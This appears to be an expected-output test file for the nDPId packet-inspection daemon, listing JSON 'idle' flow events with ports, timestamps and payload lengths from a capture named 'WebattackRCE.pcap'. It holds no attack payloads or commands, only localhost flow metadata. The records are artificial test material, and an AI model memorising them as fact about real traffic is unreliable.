+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7560000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7560000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7560000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7560000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7560000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 